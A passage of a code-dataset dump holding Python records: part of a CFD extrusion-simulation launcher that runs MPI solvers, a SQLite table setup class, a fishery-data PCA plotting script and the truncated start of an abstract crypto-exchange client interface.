\n#===============================================================================\n\n\n#===============================================================================\n# Simulation Setup \n#===============================================================================\ndef simulationSetup(workingDir, projectFile, projectPath, projectFolder):\n\n folderSetup(workingDir, projectFile, projectPath, projectFolder)\n\n exitCode = mesherStep(workingDir, projectFile, projectPath, projectFolder)\n \n partitionerStep(workingDir, projectFile, projectPath, projectFolder)\n \n return exitCode\n#===============================================================================\n\n\n#===============================================================================\n# Only Mesh Creation\n#===============================================================================\ndef onlyMeshCreation(workingDir, projectFile, projectPath, projectFolder):\n\n folderSetup(workingDir, projectFile, projectPath, projectFolder)\n\n exitCode = mesherStep(workingDir, projectFile, projectPath, projectFolder)\n \n return exitCode\n#===============================================================================\n\n \n#===============================================================================\n# Compute maximum number of simulation iterations\n#===============================================================================\ndef calcMaxSimIterations():\n nmax = 0\n\n if paramDict['hasDeltaAngle']:\n paramDict['timeLevels'] = 360.0 / paramDict['deltaAngle'] \n\n if paramDict['timeLevels'] == 1:\n nmax = 1\n else:\n paramDict['deltaAngle'] = 360.0 / float(paramDict['timeLevels'])\n nmax = int(math.ceil(360.0 / paramDict['periodicity'] / paramDict['deltaAngle']))\n\n if paramDict['singleAngle'] >= 0.0:\n nmax = 1\n \n #print(\"nmax: \",nmax)\n\n return nmax\n#===============================================================================\n\n\n#===============================================================================\n# Compute maximum number of simulation iterations\n#===============================================================================\ndef setupMPICommand():\n mpiPath = Path(\"mpirun\")\n if sys.platform == \"win32\":\n mpiPath = Path(os.environ['MSMPI_BIN']) / Path(\"mpiexec.exe\")\n\n paramDict['mpiCmd'] = mpiPath\n#===============================================================================\n\n#===============================================================================\n# The simulation loop for mesh reductuion\n#===============================================================================\ndef simLoopMeshReduction(workingDir):\n\n mpiPath = paramDict['mpiCmd']\n numProcessors = paramDict['numProcessors']\n angle = 0\n\n shutil.copyfile(\"_data/Extrud3D_0.dat\", \"_data/Extrud3D.dat\")\n\n with open(\"_data/Extrud3D.dat\", \"a\") as f:\n f.write(\"Angle=\" + str(angle) + \"\\n\")\n \n if sys.platform == \"win32\":\n exitCode = subprocess.call([r\"%s\" % str(mpiPath), \"-n\", \"%i\" % numProcessors, \"./q2p1_sse_mesh.exe\"])\n else:\n launchCommand = \"\"\n\n if paramDict['useSrun']:\n launchCommand = \"srun \" + os.getcwd() + \"/q2p1_sse_mesh\"\n if paramDict['singleAngle'] >= 0.0:\n launchCommand = launchCommand + \" -a %d\" %(angle)\n else:\n launchCommand = \"mpirun -np \" + str(numProcessors) + \" \" + os.getcwd() + \"/q2p1_sse_mesh\"\n if paramDict['singleAngle'] >= 0.0 :\n launchCommand = launchCommand + \" -a %d\" %(angle)\n \n myLog.updateStatusLine(\"CurrentStatus=running Mesh reduction module\")\n \n exitCode = subprocess.call([launchCommand], shell=True)\n\n if exitCode != 0:\n myLog.logErrorExit(\"CurrentStatus=abnormal Termination Momentum Solver\", exitCode)\n else:\n myLog.updateStatusLine(\"CurrentStatus=finished Mesh reduction module\")\n \n#===============================================================================\n# The simulation loop for velocity calculation\n#===============================================================================\ndef simLoopVelocity(workingDir):\n nmax = calcMaxSimIterations()\n\n mpiPath = paramDict['mpiCmd']\n numProcessors = paramDict['numProcessors']\n\n nmin = 0\n start = 0.0\n maxInnerIters = parseMaxNumSteps(\"_data/q2p1_param.dat\")\n with open(\"_data/Extrud3D_0.dat\", \"a\") as f:\n f.write(\"\\n[E3DSimulationSettings]\\n\")\n f.write(\"dAlpha=\" + str(paramDict['deltaAngle']) + \"\\n\")\n f.write(\"Periodicity=\" + str(paramDict['periodicity']) + \"\\n\")\n f.write(\"nSolutions=\" + str(paramDict['timeLevels']) + \"\\n\")\n\n for i in range(nmin, nmax): # nmax means the loop goes to nmax-1\n if paramDict['singleAngle'] >= 0.0:\n angle = paramDict['singleAngle']\n else:\n angle = start + i * paramDict['deltaAngle']\n\n shutil.copyfile(\"_data/Extrud3D_0.dat\", \"_data/Extrud3D.dat\")\n\n with open(\"_data/Extrud3D.dat\", \"a\") as f:\n f.write(\"Angle=\" + str(angle) + \"\\n\")\n\n statusMsg = \"CurrentAngleIteration=%i\\n\"\\\n \"MaxAngleIteration=%i\\n\"\\\n \"CurrentInnerIteration=%i\\n\"\\\n \"MaxInnerIteration=%i\\n\"\\\n \"CurrentStatus=running Momentum Solver\" %(i+1, nmax, 1, maxInnerIters)\n myLog.updateStatusLineIteration(statusMsg, i)\n\n workingDir = os.getcwd()\n protocolFilePath = os.path.join(workingDir, \"_data\")\n\n eventHandler = ProtocolObserver()\n observer = \"\" \n if sys.platform == \"win32\":\n observer = PollingObserver()\n else:\n observer = Observer()\n\n observer.schedule(eventHandler, path=protocolFilePath, recursive=False)\n observer.start()\n\n if sys.platform == \"win32\":\n exitCode = subprocess.call([r\"%s\" % str(mpiPath), \"-n\", \"%i\" % numProcessors, \"./q2p1_sse.exe\"])\n else:\n launchCommand = \"\"\n\n if paramDict['useSrun']:\n launchCommand = \"srun \" + os.getcwd() + \"/q2p1_sse\"\n if paramDict['singleAngle'] >= 0.0:\n launchCommand = launchCommand + \" -a %d\" %(angle)\n else:\n launchCommand = \"mpirun -np \" + str(numProcessors) + \" \" + os.getcwd() + \"/q2p1_sse\"\n if paramDict['singleAngle'] >= 0.0 :\n launchCommand = launchCommand + \" -a %d\" %(angle)\n\n exitCode = subprocess.call([launchCommand], shell=True)\n\n if paramDict['retryDeformation'] and exitCode == 55:\n with open(\"_data/q2p1_param.dat\", \"r\") as f:\n for l in f:\n if \"SimPar@UmbrellaStepM\" in l:\n orig_umbrella = int(l.split()[2])\n UmbrellaStepM = orig_umbrella\n while exitCode == 55 and UmbrellaStepM != 0:\n replace_in_file(\"_data/q2p1_param.dat\", \"SimPar@UmbrellaStepM = \"+str(UmbrellaStepM), \"SimPar@UmbrellaStepM = \"+str(int(UmbrellaStepM/2)))\n UmbrellaStepM = int(UmbrellaStepM / 2)\n print(\"Retrying deformation with UmbrellaStepsM = %d\" % UmbrellaStepM)\n exitCode = subprocess.call([launchCommand], shell=True)\n replace_in_file(\"_data/q2p1_param.dat\", \"SimPar@UmbrellaStepM = \"+str(UmbrellaStepM), \"SimPar@UmbrellaStepM = \"+str(orig_umbrella))\n if UmbrellaStepM == 0:\n print(\"UmbrellaStepsM reduced to 0 during retry\")\n\n # Here the observer can be turned off\n observer.stop()\n\n if exitCode == 88:\n myLog.logErrorExit(\"CurrentStatus=the screw could not be created: wrong angle\", exitCode)\n\n if exitCode != 0:\n myLog.logErrorExit(\"CurrentStatus=abnormal Termination Momentum Solver\", exitCode)\n\n # Write final inner iteration state\n statusMsg = \"CurrentInnerIteration=%i\\n\"\\\n \"MaxInnerIteration=%i\\n\"\\\n \"CurrentStatus=running Momentum Solver\" %(maxInnerIters, maxInnerIters)\n myLog.updateStatusLineInnerIteration(statusMsg)\n\n iangle = int(angle)\n if os.path.exists(Path(\"_data/prot.txt\")):\n shutil.copyfile(\"_data/prot.txt\", \"_data/prot_%04d.txt\" % iangle)\n\n return exitCode \n#===============================================================================\n\n\n#===============================================================================\n# The simulatio loop for velocity calculation\n#===============================================================================\ndef cleanWorkingDir(workingDir):\n if not sys.platform == \"win32\":\n offList = list(workingDir.glob('*.off')) + list(workingDir.glob('*.OFF'))\n else: \n offList = list(workingDir.glob('*.off'))\n\n # temporarily blocked ==> should be released later\n #for item in offList:\n #os.remove(str(item))\n#===============================================================================\n\n\n#===============================================================================\n# The simulatio loop for velocity calculation\n#===============================================================================\ndef simLoopTemperatureCombined(workingDir):\n\n numProcessors = paramDict['numProcessors']\n mpiPath = paramDict['mpiCmd']\n maxIterations = 2\n for iter in range(maxIterations):\n \n if paramDict['shortTest']:\n backupVeloFile = Path(\"_data_BU\") / Path(\"q2p1_paramV_%01d_test.dat\" % iter)\n else:\n backupVeloFile = Path(\"_data_BU\") / Path(\"q2p1_paramV_%01d.dat\" % iter)\n \n if paramDict['shortTest']:\n backupTemperatureFile = Path(\"_data_BU\") / Path(\"q2p1_paramT_test.dat\")\n else:\n backupTemperatureFile = Path(\"_data_BU\") / Path(\"q2p1_paramT_%01d.dat\" % iter)\n \n veloDestFile = Path(\"_data\") / Path(\"q2p1_param.dat\")\n temperatureDestFile = Path(\"_data\") / Path(\"q2p1_paramT.dat\")\n print(\"Copying: \", backupVeloFile, veloDestFile)\n print(\"Copying: \", backupTemperatureFile, temperatureDestFile)\n shutil.copyfile(str(backupVeloFile), str(veloDestFile))\n shutil.copyfile(str(backupTemperatureFile), str(temperatureDestFile))\n\n if iter > 0:\n myLog.updateStatusLineHeatIteration(\"CurrentHeatIteration=%i\\nHeatMaxIteration=%i\\nCurrentStatus=running Heat Solver\" %(iter+1, maxIterations))\n\n else:\n myLog.writeStatusHeat(\"CurrentHeatIteration=%i\\nMaxHeatIteration=%i\\nCurrentStatus=running Heat Solver\" %(iter+1, maxIterations))\n \n exitCode = simLoopVelocity(workingDir)\n\n# statusMsg = \"CurrentIteration=%i\\nMaxIteration=%i\\nCurrentStatus=running Momentum Solver\" %(i+1, nmax)\n\n if sys.platform == \"win32\":\n exitCode = subprocess.call([r\"%s\" % str(mpiPath), \"-n\", \"%i\" % numProcessors, \"./q2p1_sse_temp.exe\"])\n else:\n\n launchCommand = \"\"\n\n if paramDict['useSrun']:\n launchCommand = \"srun \" + os.getcwd() + \"/q2p1_sse_temp\"\n if paramDict['singleAngle'] >= 0.0:\n launchCommand = launchCommand + \" -a %d\" %(angle)\n else:\n launchCommand = \"mpirun -np \" + str(numProcessors) + \" \" + os.getcwd() + \"/q2p1_sse_temp\"\n if paramDict['singleAngle'] >= 0.0 :\n launchCommand = launchCommand + \" -a %d\" %(angle)\n\n exitCode = subprocess.call([launchCommand], shell=True)\n\n if exitCode != 0:\n myLog.logErrorExit(\"CurrentStatus=abnormal Termination Heat Solver\", exitCode)\n\n myLog.popLinesAndWrite(5, \"CurrentStatus=running Heat Solver\")\n \n dirName = Path(\"_prot%01d\" % iter)\n mkdir(dirName)\n protList = list(Path(\"_data\").glob('prot*'))\n \n for item in protList:\n shutil.copy(str(item), dirName)\n os.remove(item)\n\n if paramDict['shortTest']:\n backupVeloFile = Path(\"_data_BU\") / Path(\"q2p1_paramV_%01d_test.dat\" % maxIterations)\n else:\n backupVeloFile = Path(\"_data_BU\") / Path(\"q2p1_paramV_%01d.dat\" % maxIterations)\n \n veloDestFile = Path(\"_data\") / Path(\"q2p1_param.dat\")\n print(\"Copying: \", backupVeloFile, veloDestFile)\n shutil.copyfile(str(backupVeloFile), str(veloDestFile))\n\n #myLog.popLinesAndWrite(3, \"CurrentStatus=running Heat Solver\")\n exitCode = simLoopVelocity(workingDir)\n#===============================================================================\n\n\n#===============================================================================\n# The cfd simulation loop for partial filling\n#===============================================================================\ndef simLoopMainPartialFilling(workingDir, it, loops):\n\n nmax = calcMaxSimIterations()\n\n mpiPath = paramDict['mpiCmd']\n numProcessors = paramDict['numProcessors']\n\n nmin = 0\n start = 0.0\n maxInnerIters = parseMaxNumSteps(\"_data/q2p1_param.dat\")\n if debugNoSim:\n print(\"Line 676, Updating maxInnerIters: \", maxInnerIters)\n with open(\"_data/Extrud3D_0.dat\", \"a\") as f:\n f.write(\"\\n[E3DSimulationSettings]\\n\")\n f.write(\"dAlpha=\" + str(paramDict['deltaAngle']) + \"\\n\")\n f.write(\"Periodicity=\" + str(paramDict['periodicity']) + \"\\n\")\n f.write(\"nSolutions=\" + str(paramDict['timeLevels']) + \"\\n\")\n\n\n for i in range(nmin, nmax): # nmax means the loop goes to nmax-1\n\n if paramDict['singleAngle'] >= 0.0:\n angle = paramDict['singleAngle']\n else:\n angle = start + i * paramDict['deltaAngle']\n\n shutil.copyfile(\"_data/Extrud3D_0.dat\", \"_data/Extrud3D.dat\")\n\n with open(\"_data/Extrud3D.dat\", \"a\") as f:\n f.write(\"Angle=\" + str(angle) + \"\\n\")\n\n statusMsg = \"CurrentAngleIteration=%i\\n\"\\\n \"MaxAngleIteration=%i\\n\"\\\n \"CurrentInnerIteration=%i\\n\"\\\n \"MaxInnerIteration=%i\\n\"\\\n \"CurrentStatus=running Momentum Solver\" %(it+1, loops+1, 1, maxInnerIters)\n\n myLog.updateStatusLineIteration(statusMsg, it)\n\n workingDir = os.getcwd()\n protocolFilePath = os.path.join(workingDir, \"_data\")\n\n eventHandler = ProtocolObserver()\n observer = \"\" \n if sys.platform == \"win32\":\n observer = PollingObserver()\n else:\n observer = Observer()\n\n observer.schedule(eventHandler, path=protocolFilePath, recursive=False)\n observer.start()\n\n if not debugNoSim:\n if sys.platform == \"win32\":\n exitCode = subprocess.call([r\"%s\" % str(mpiPath), \"-n\", \"%i\" % numProcessors, \"./q2p1_sse_partfil.exe\"])\n else:\n launchCommand = \"\"\n\n if paramDict['useSrun']:\n launchCommand = \"srun \" + os.getcwd() + \"/q2p1_sse\"\n if paramDict['singleAngle'] >= 0.0:\n launchCommand = launchCommand + \" -a %d\" %(angle)\n else:\n launchCommand = \"mpirun -np \" + str(numProcessors) + \" \" + os.getcwd() + \"/q2p1_sse_partfil\"\n if paramDict['singleAngle'] >= 0.0 :\n launchCommand = launchCommand + \" -a %d\" %(angle)\n\n exitCode = subprocess.call([launchCommand], shell=True)\n\n if paramDict['retryDeformation'] and exitCode == 55:\n with open(\"_data/q2p1_param.dat\", \"r\") as f:\n for l in f:\n if \"SimPar@UmbrellaStepM\" in l:\n orig_umbrella = int(l.split()[2])\n UmbrellaStepM = orig_umbrella\n while exitCode == 55 and UmbrellaStepM != 0:\n replace_in_file(\"_data/q2p1_param.dat\", \"SimPar@UmbrellaStepM = \"+str(UmbrellaStepM), \"SimPar@UmbrellaStepM = \"+str(int(UmbrellaStepM/2)))\n UmbrellaStepM = int(UmbrellaStepM / 2)\n exitCode = subprocess.call([launchCommand], shell=True)\n replace_in_file(\"_data/q2p1_param.dat\", \"SimPar@UmbrellaStepM = \"+str(UmbrellaStepM), \"SimPar@UmbrellaStepM = \"+str(orig_umbrella))\n else:\n input(\"Line 743, DebugMode, SimLoopMainPartialFilling: q2p1_sse_partfil\")\n exitCode = 0 \n # Here the observer can be turned off\n observer.stop()\n \n if exitCode == 88:\n myLog.logErrorExit(\"CurrentStatus=the screw could not be created: wrong angle\", exitCode)\n\n if exitCode != 0:\n myLog.logErrorExit(\"CurrentStatus=abnormal Termination Momentum Solver\", exitCode)\n\n # Write final inner iteration state\n statusMsg = \"CurrentInnerIteration=%i\\n\"\\\n \"MaxInnerIteration=%i\\n\"\\\n \"CurrentStatus=running Multiphase Momentum Solver\" %(maxInnerIters, maxInnerIters)\n myLog.updateStatusLineInnerIteration(statusMsg)\n\n iangle = int(angle)\n if os.path.exists(Path(\"_data/prot.txt\")):\n shutil.copyfile(\"_data/prot.txt\", \"_data/prot_%04d.txt\" % iangle)\n\n return exitCode \n#===============================================================================\n\n\n#===============================================================================\n# The simulation loop for partial filling\n#===============================================================================\ndef simLoopPartialFilling(workingDir):\n\n mpiPath = paramDict['mpiCmd']\n numProcessors = paramDict['numProcessors']\n\n if paramDict['shortTest']:\n nLoops = 2 \n else:\n nLoops = 4 \n\n # Start the initial loop\n it = 0\n if debugNoSim:\n input(\"Line 784, DebugMode, SimLoopPartialFilling: Initial q2p1_sse_partfil iteration\")\n simLoopMainPartialFilling(workingDir, it, nLoops)\n it = it + 1\n\n \n for i in range(nLoops):\n if paramDict['shortTest']:\n sourceParamFile = Path(\"_data_PF\") / Path(\"q2p1_paramAlpha_test.dat\")\n else:\n sourceParamFile = Path(\"_data_PF\") / Path(\"q2p1_paramAlpha.dat\")\n \n destBackupFile = Path(\"_data\") / Path(\"q2p1_param.dat\")\n shutil.copyfile(str(sourceParamFile), str(destBackupFile))\n msg = \"Copied %s => %s \" %(str(sourceParamFile), str(destBackupFile))\n if debugNoSim:\n print(msg)\n\n sourceParamFile = Path(\"_data_PF\") / Path(\"mesh_names.offs\")\n destBackupFile = Path(\"./mesh_names.offs\")\n shutil.copyfile(str(sourceParamFile), str(destBackupFile))\n msg = \"Copied %s => %s \" %(str(sourceParamFile), str(destBackupFile))\n #print(msg)\n\n if not debugNoSim:\n if sys.platform == \"win32\":\n exitCode = subprocess.call([r\"%s\" % str(mpiPath), \"-n\", \"%i\" % numProcessors, \"./q1_scalar_partfil.exe\"])\n else:\n launchCommand = \"\"\n\n if paramDict['useSrun']:\n launchCommand = \"srun \" + os.getcwd() + \"/q1_scalar_partfil\"\n else:\n launchCommand = \"mpirun -np \" + str(numProcessors) + \" \" + os.getcwd() + \"/q1_scalar_partfil\"\n\n exitCode = subprocess.call([launchCommand], shell=True) \n else:\n input(\"Line 824, DebugMode, SimLoopPartialFilling: q1_scalar_partfil\")\n exitCode = 0 \n\n if paramDict['shortTest']:\n sourceParamFile = Path(\"_data_PF\") / Path(\"q2p1_paramV_1_test.dat\")\n else:\n sourceParamFile = Path(\"_data_PF\") / Path(\"q2p1_paramV_1.dat\")\n\n destBackupFile = Path(\"_data\") / Path(\"q2p1_param.dat\")\n shutil.copyfile(str(sourceParamFile), str(destBackupFile))\n msg = \"Copied %s => %s \" %(str(sourceParamFile), str(destBackupFile))\n if debugNoSim:\n print(msg)\n\n simLoopMainPartialFilling(workingDir, it, nLoops)\n it = it + 1\n#===============================================================================\n \n\n#===============================================================================\n# Main Script Function\n#===============================================================================\ndef main():\n \"\"\"\n The main function that controls the extrusion process\n\n Options:\n project-folder: Path to project folder containing a setup.e3d file \n num-processors: Number of processors to use\n periodicity: Periodicity of the solution (1, 2, 3, ... usually the time flight number)\n angle: The angular step size between two simulations in the sim loop (default 10)\n host-conf: A hostfile as input for the mpirun command\n rank-file: A rankfile as input for the mpirun command\n time: Number of time levels to complete a full 360 rotation \n \"\"\"\n\n try:\n opts, args = getopt.getopt(sys.argv[1:], 'n:f:p:d:a:c:r:t:smxhovur',\n ['num-processors=', 'project-folder=',\n 'periodicity=', 'delta-angle=', 'angle=',\n 'host-conf=', 'rank-file=', 'time=', 'skip-setup','die-simulation',\n 'skip-simulation','short-test', 'help',\n 'do-temperature','version', 'use-srun',\n 'retry-deformation', 'partial-filling','only-mesh-creation',\n 'mesh-reduction'])\n\n except getopt.GetoptError:\n usage()\n sys.exit(2)\n\n for opt, arg in opts:\n if opt in ('-h', '--help'):\n usage()\n sys.exit(2)\n elif opt in ('-f', '--project-folder'):\n paramDict['projectFolder'] = arg\n elif opt in ('-n', '--num-processors'):\n paramDict['numProcessors'] = int(arg)\n elif opt in ('-p', '--periodicity'):\n paramDict['periodicity'] = int(arg)\n elif opt in ('-a', '--angle'):\n paramDict['singleAngle'] = float(arg)\n elif opt in ('-d', '--delta-angle'):\n paramDict['deltaAngle'] = float(arg)\n paramDict['hasDeltaAngle'] = True \n if paramDict['deltaAngle'] <= 0.0:\n print(\"Parameter deltaAngle is set to a number <= 0 which is invalid. Please enter a number > 0\")\n sys.exit(2)\n elif opt in ('-c', '--host-conf'):\n paramDict['hostFile'] = arg\n elif opt in ('-r', '--rank-file'):\n paramDict['rankFile'] = arg\n elif opt in ('-t', '--time'):\n paramDict['timeLevels'] = int(arg)\n paramDict['hasTimeLevels'] = True \n if paramDict['timeLevels'] == 0:\n print(\"Parameter timeLevels is set to a number <= 0 which is invalid. Please enter a number > 0\")\n sys.exit(2)\n elif opt in ('-s', '--skip-setup'):\n paramDict['skipSetup'] = True\n elif opt in ('-m', '--skip-simulation'):\n paramDict['skipSimulation'] = True\n elif opt in ('-o', '--do-temperature'):\n paramDict['temperature'] = True\n elif opt in ('-v', '--version'):\n version()\n sys.exit(2)\n elif opt in ('-x', '--short-test'):\n paramDict['shortTest'] = True\n elif opt in ('-u', '--use-srun'):\n paramDict['useSrun'] = True\n elif opt in ('--die-simulation'):\n paramDict['dieSimulation'] = True\n elif opt in ('--mesh-reduction'):\n paramDict['meshReduction'] = True\n elif opt in ('--retry-deformation'):\n paramDict['retryDeformation'] = True\n elif opt in ('--partial-filling'):\n paramDict['partialFilling'] = True\n paramDict['singleAngle'] = 0.0 \n elif opt in ('--only-mesh-creation'):\n paramDict['onlyMeshCreation'] = True\n else:\n usage()\n sys.exit(2)\n\n if paramDict['projectFolder'] == \"\":\n print(\"Error: no project folder specified.\")\n usage()\n sys.exit(2)\n\n if (paramDict['hasDeltaAngle'] and paramDict['hasTimeLevels']):\n print(\"Error: Specifying both deltaAngle and timeLevels at the same time is error-prone and therefore prohibited.\")\n sys.exit(2)\n \n if (paramDict['singleAngle'] >= 0.0 and paramDict['temperature']) :\n print(\"Error: Specifying both singleAngle and Temperature Simulation at the same time is prohibited.\")\n sys.exit(2)\n \n if (paramDict['dieSimulation']) :\n print(\"Switching to 'DIE' simulation !\")\n paramDict['singleAngle'] = 0\n\n if (paramDict['meshReduction']) :\n print(\"Switching to 'MESHreduction' mode !\")\n paramDict['singleAngle'] = 0\n\n if (paramDict['numProcessors'] < 3 and not paramDict['onlyMeshCreation']) :\n print(\"Number of processors should be > 3\")\n sys.exit(2)\n\n# if (paramDict['onlyMeshCreation']) :\n# print(\"Only doing mesh creation\")\n# sys.exit(2)\n \n # Get the case/working dir paths\n projectFolder = paramDict['projectFolder'] \n workingDir = Path('.')\n projectPath = Path(workingDir / projectFolder)\n projectFile = Path(projectPath / 'setup.e3d')\n\n myLog.openFileHandle()\n myLog.writeGeneralInfo(paramDict)\n myLog.writeNumAnglePositions(calcMaxSimIterations())\n myLog.writeStatusLine2()\n myLog.closeFileHandle()\n\n setupMPICommand()\n\n e3dSetupDict = e3dToDict(projectFile)\n\n if not paramDict['hasTimeLevels']:\n if \"SimodSetting\" in e3dSetupDict:\n if \"time_levels\" in e3dSetupDict['SimodSetting']:\n if e3dSetupDict['SimodSetting']['time_levels'].isnumeric():\n paramDict['timeLevels'] = int(e3dSetupDict['SimodSetting']['time_levels'])\n paramDict['hasTimeLevels'] = True\n else:\n raise TypeError(\"e3d.setup ['SimodSettings']['time_levels'] is not a numeric entry. Pls enter a number > 0.\")\n\n\n if not paramDict['skipSetup']:\n if paramDict['onlyMeshCreation']:\n exitCode = onlyMeshCreation(workingDir, projectFile, projectPath, projectFolder)\n return\n else:\n exitCode = simulationSetup(workingDir, projectFile, projectPath, projectFolder)\n\n if paramDict['skipSimulation']:\n sys.exit()\n\n print(\" \")\n print(\" ----------------------------------------------------------------------------------------------------- \")\n print(\" Launching E3D... \")\n print(\" ----------------------------------------------------------------------------------------------------- \")\n print(\" \")\n print(\" \")\n\n if paramDict['partialFilling']:\n simLoopPartialFilling(workingDir)\n cleanWorkingDir(workingDir)\n elif paramDict['temperature']:\n simLoopTemperatureCombined(workingDir)\n cleanWorkingDir(workingDir)\n elif paramDict['meshReduction']:\n simLoopMeshReduction(workingDir)\n cleanWorkingDir(workingDir)\n projectFolder = paramDict['projectFolder'] \n projectPath = Path(workingDir / projectFolder)\n meshDirPath = projectPath / Path(\"meshDir\")\n print(\"Backup and copy the newly gained reduced mesh from \" + \n \"'ReducedMeshDir' to \" + str(meshDirPath))\n shutil.move(str(meshDirPath),str(meshDirPath) + \"_BU\")\n shutil.copytree(\"ReducedMeshDir\", str(meshDirPath))\n else:\n simLoopVelocity(workingDir)\n cleanWorkingDir(workingDir)\n\n#===============================================================================\n# Main Boiler Plate\n#===============================================================================\nif __name__ == \"__main__\":\n main()\n myLog.writeExitMsg()\n","repo_name":"rmuenste/FeatFloWer","sub_path":"tools/e3d_scripts/e3d_start.py","file_name":"e3d_start.py","file_ext":"py","file_size_in_byte":44785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31220222355","text":"import sqlite3\r\n\r\n\r\nclass connectDB:\r\n def __init__(self):\r\n self.connect = sqlite3.connect('database.db')\r\n\r\n def create_table(self):\r\n con = self.connect.cursor()\r\n\r\n con.execute(\"\"\"create table if not exists book (\r\n id_book integer primary key autoincrement ,\r\n name text,\r\n author text,\r\n launch text,\r\n edition text,\r\n publishing_company text,\r\n genre text)\"\"\")\r\n self.connect.commit()\r\n con.close()","repo_name":"CidAlexandre/Book","sub_path":"CRUD/connect_db.py","file_name":"connect_db.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25714219941","text":"import pandas as pd\nimport numpy as np\nfrom scipy.spatial import distance_matrix\n# from scipy.spatial import distance\n# from scipy.spatial.distance import cdist\nfrom sklearn import manifold\n# import collections\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\n\nimport matplotlib.pyplot as plt\n\nimport pdb\n\ndef biplot(X, labels, arrow_mul=1, text_mul=1.1):\n\n pca = PCA(n_components=2)\n X = pca.fit_transform(X)\n\n x_data = X[:,0]\n y_data = X[:,1]\n\n pc0 = pca.components_[0]\n pc1 = pca.components_[1]\n\n plt.figure()\n plt.scatter(x_data, y_data)\n\n for i in range(pc0.shape[0]):\n plt.arrow(0, 0,\n pc0[i]*arrow_mul, pc1[i]*arrow_mul,\n color='r')\n plt.text(pc0[i]*arrow_mul*text_mul,\n pc1[i]*arrow_mul*text_mul,\n labels,\n color='r')\n plt.show()\n\n\n\"\"\"\ndf = pd.read_csv('chinen.csv')\nspecimen = set(df.iloc[:, 2])\namount = df.iloc[:, 4]\n# specimen_count = collections.Counter(specimen)\n\nspec_amount_dict = {}\nfor species in specimen:\n idx = np.where(df.iloc[:, 2] == species, True, False)\n spec_amount_dict[species] = np.sum(amount.iloc[idx])\n\nsorted_list = sorted(spec_amount_dict.items(), key=lambda x:x[1])\nsorted_amount_list = [item[1] for item in sorted_list][::-1]\nsorted_specimen_list = [item[0] for item in sorted_list][::-1]\ncum_ratio_list = np.cumsum(sorted_amount_list)/np.sum(sorted_amount_list)\nfocused_idx = np.where(cum_ratio_list < 0.9, True, False)\n\nfocused_specimen_list = sorted_specimen_list[:20]\nfocused_years_list = np.arange(1996, 2021)\n\nresult_df = \"\"\nfor year in focused_years_list:\n year_str = str(year)\n idx = [year_str in item for item in df.iloc[:, 0]]\n sub_df = df.iloc[idx, :]\n sub_df = sub_df.reset_index(drop=True)\n\n tmp_dict = {}\n for i in range(len(sub_df)):\n species = sub_df.iat[i, 2]\n if species in focused_specimen_list:\n if species in tmp_dict:\n tmp_dict[species] += sub_df.iat[i, 4]\n else:\n tmp_dict[species] = sub_df.iat[i, 4]\n else:\n if 10000 in tmp_dict:\n tmp_dict[10000] += sub_df.iat[i, 4]\n else:\n tmp_dict[10000] = sub_df.iat[i, 4]\n\n tmp_ser = pd.Series(tmp_dict)\n\n if isinstance(result_df, str):\n result_df = pd.DataFrame(tmp_ser)\n result_df = result_df.T\n else:\n result_df = result_df.append(tmp_ser, ignore_index=True)\n\nnan_idx = np.isnan(result_df)\nresult_df[nan_idx] = 0\nresult_df.to_csv(\"year_feature_mat.csv\")\n\"\"\"\n\nfeature_df = pd.read_csv('year_feature_mat.csv')\nfeature_df = feature_df.iloc[:, 1:]\n# feature_df = pd.read_csv('cross.csv', index_col=0)\nlabels = feature_df.columns\nautoscaled_df = (feature_df - feature_df.mean()) / feature_df.std()\n\n# biplot(autoscaled_df, labels, arrow_mul=6)\n\npca = PCA()\npca.fit(autoscaled_df)\nscore = pd.DataFrame(pca.transform(autoscaled_df), index=feature_df.index)\n\nplt.scatter(score.iloc[:, 0], score.iloc[:, 1])\nplt.show()\n\npdb.set_trace()\n\n\"\"\"\ndist_mat = distance_matrix(feature_df.values, feature_df.values)\n# dist_mat = cdist(feature_df.values, feature_df.values, 'mahalanobis')\nmds = manifold.MDS(n_components=2, dissimilarity=\"precomputed\", random_state=6)\npos = mds.fit_transform(dist_mat)\n\npdb.set_trace()\ncov_mat = np.matrix(np.cov(feature_df.values.T, dtype=np.float64))\ninv_cov_mat = np.linalg.inv(cov_mat)\nmah_dist_mat = np.zeros((len(feature_df), len(feature_df)))\nfor i in range(0, (len(feature_df)-1)):\n u = feature_df.values[i, ]\n for j in range(i, len(feature_df)):\n v = feature_df.values[j, ]\n dist = distance.mahalanobis(u, v, inv_cov_mat)\n if np.isnan(dist):\n pdb.set_trace()\n mah_dist_mat[i, j] = dist\n\"\"\"\n\nplt.scatter(pos[:, 0], pos[:, 1], marker = 'o')\nlabels = np.arange(1996, 2021)\n\nfor label, x, y in zip(labels, pos[:, 0], pos[:, 1]):\n plt.annotate(\n label,\n xy = (x, y),\n )\nplt.show()\n\npos_df = pd.DataFrame(pos)\npos_df.columns = ['x', 'y']\npos_df.to_csv('pos.csv')\n\npdb.set_trace()\n","repo_name":"djinn-pfa3736/fishery_data_analysis","sub_path":"phase_space_plot.py","file_name":"phase_space_plot.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42675283382","text":"import abc\nfrom typing import List\n\nfrom model.savings import InterestData\nfrom model.transaction import TradingPair, TradeData\nfrom model.withdrawal_deposit import WithdrawalData, DepositData\n\n\nclass ExchangeException(Exception):\n pass\n\n\nclass ExchangeUnderMaintenanceException(ExchangeException):\n pass\n\n\nclass AbstractCryptoExchangeClient(metaclass=abc.ABCMeta):\n @classmethod\n def __subclasshook__(cls, subclass):\n return (callable(subclass.get_trading_pairs) and\n hasattr(subclass, 'get_trading_pairs') and\n callable(subclass.get_trades) and\n hasattr(subclass, 'get_trades') and\n callable(subclass.get_savings_interests) and\n hasattr(subclass, 'get_savings_interests') and\n callable(subclass.get_withdrawals) and\n hasattr(subclass, 'get_withdrawals') and\n callable(subclass.get_deposits) and\n hasattr(subclass, 'get_deposits') or\n NotImplemented)\n\n @abc.abstractmethod\n def get_trading_pairs(self, list_of_symbols_and_codes: List[str]) -> List[TradingPair]:\n raise NotImplementedError\n\n @abc.abstractmethod\n def get_trades(self, from_timestamp: int, to_timestamp: int, 